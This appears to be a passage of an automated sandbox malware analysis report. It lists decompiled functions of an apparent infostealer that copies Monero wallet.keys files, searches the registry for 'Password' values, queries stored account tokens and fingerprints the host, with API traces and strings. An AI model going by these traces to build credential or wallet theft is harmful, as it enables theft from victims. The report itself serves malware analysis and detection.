Part of subcall function 004712A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004712D7
Part of subcall function 004712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
Part of subcall function 004712A0: RegCloseKey.ADVAPI32(?), ref: 004712FF

lstrcat.KERNEL32(?,00000000), ref: 0047134F
lstrlen.KERNEL32(?), ref: 0047135C
lstrcat.KERNEL32(?,.keys), ref: 00471377

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0110A750,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01109178,?,\Monero\wallet.keys,00490E17), ref: 00488B86

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00471465

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A

DeleteFileA.KERNEL32(00000000), ref: 004714EF

Strings

.keys, xrefs: 0047136B
SOFTWARE\monero-project\monero-core, xrefs: 00471335
\Monero\wallet.keys, xrefs: 0047138D
wallet_path, xrefs: 00471330

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 0fd69e1371bd17c15fe5c67ba4ed6d48880e7fea7a47e9eafe67ece7654b7760
Instruction ID: e79b2ac46bd339641254e03a6fa1001e5f3129794780f40cc0ea9089a2c0def1
Opcode Fuzzy Hash: 0fd69e1371bd17c15fe5c67ba4ed6d48880e7fea7a47e9eafe67ece7654b7760
Instruction Fuzzy Hash: 925164B1D101185BDB15FB61DC92FED733CAF50304F4045EEB60A62091EE786B99CBAA

Function 00487500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00487542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487603
RtlAllocateHeap.NTDLL(00000000), ref: 0048760A
wsprintfA.USER32 ref: 00487640

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Strings

C, xrefs: 0048754C
\, xrefs: 00487560
:, xrefs: 0048755C
I, xrefs: 0048764D, 00487655, 0048761B, 00487623

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$I
API String ID: 1544550907-2636280491
Opcode ID: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
Instruction ID: 0cd46ac30d74b8a1c1641622ec5f94c47e433e7a31435508609a27c424df082d
Opcode Fuzzy Hash: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
Instruction Fuzzy Hash: 1F4194B1D04248ABDB10EF94DC55BDEBBB8EF08714F10459EF50967280D778AA84CBA5

Function 004775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004772D0: memset.MSVCRT ref: 00477314
Part of subcall function 004772D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0047733A
Part of subcall function 004772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
Part of subcall function 004772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
Part of subcall function 004772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
Part of subcall function 004772D0: HeapFree.KERNEL32(00000000), ref: 00477459

lstrcat.KERNEL32(2F6D6020,004917FC), ref: 00477606
lstrcat.KERNEL32(2F6D6020,00000000), ref: 00477648
lstrcat.KERNEL32(2F6D6020, : ), ref: 0047765A
lstrcat.KERNEL32(2F6D6020,00000000), ref: 0047768F
lstrcat.KERNEL32(2F6D6020,00491804), ref: 004776A0
lstrcat.KERNEL32(2F6D6020,00000000), ref: 004776D3
lstrcat.KERNEL32(2F6D6020,00491808), ref: 004776ED
task.LIBCPMTD ref: 004776FB

Strings

: , xrefs: 0047764E

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
Instruction ID: 5680078f2224a3743f068bcf2819f254980c1f52b4a48c731e4245cdc856c424
Opcode Fuzzy Hash: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
Instruction Fuzzy Hash: CF315EB1A00109EBCB04EBF5DC89DFE7775FB44305B54821EF106A7290DA38A986CB66

Function 004772D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00477314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0047733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
HeapFree.KERNEL32(00000000), ref: 00477459
task.LIBCPMTD ref: 00477555

Strings

Password, xrefs: 00477401

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
Instruction ID: dbe5aff23e83898a50f6197ea4e26f651b5c451e8b2c49ecdba4f5a5383348bf
Opcode Fuzzy Hash: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
Instruction Fuzzy Hash: 45615AB58441689BDB24DB50CC45BDAB7B8BF44304F00C1EAE64DA6241DBB45FC9CFA5

Function 00488100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0110DF18,00000000,?,00490E2C,00000000,?,00000000), ref: 00488130
RtlAllocateHeap.NTDLL(00000000), ref: 00488137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00488158
__aulldiv.LIBCMT ref: 00488172
__aulldiv.LIBCMT ref: 00488180
wsprintfA.USER32 ref: 004881AC

Strings

%d MB, xrefs: 004881A3
@, xrefs: 0048814D

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
Instruction ID: b81a6bfe40f840e137cd4e492939b32e56726a56752d4d6336444b2d59a99e95
Opcode Fuzzy Hash: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
Instruction Fuzzy Hash: E7210EF1E44218ABDB04EFD5CC49FAEB779FB44714F204619F605BB280D77869018BA9

Function 004760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849

InternetOpenA.WININET(00490DF7,00000001,00000000,00000000,00000000), ref: 0047610F
StrCmpCA.SHLWAPI(?,0110E8F8), ref: 00476147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0047618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004761B3
InternetReadFile.WININET(?,?,00000400,?), ref: 004761DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0047620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00476249
InternetCloseHandle.WININET(?), ref: 00476253
InternetCloseHandle.WININET(00000000), ref: 00476260

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: eb6da8d1a1752c3b5522652fa946bb063b0eb0bede2ce7e9b2adb412b7797d2e
Instruction ID: be20a424b778eaed9707d2aa953f943c8a53edc4e737eac2906fbf4d95028fb5
Opcode Fuzzy Hash: eb6da8d1a1752c3b5522652fa946bb063b0eb0bede2ce7e9b2adb412b7797d2e
Instruction Fuzzy Hash: 345196B0900208AFDB10EF91CC49BEE7779EB04305F10859AF609A71C1DBB86A85CF5A

Function 0047BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

lstrlen.KERNEL32(00000000), ref: 0047BC9F

Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0047BCCD
lstrlen.KERNEL32(00000000), ref: 0047BDA5
lstrlen.KERNEL32(00000000), ref: 0047BDB9

Strings

AccountId, xrefs: 0047BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0047BBEB
AccountTokens, xrefs: 0047BB49
AccountTokens, xrefs: 0047BABA

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
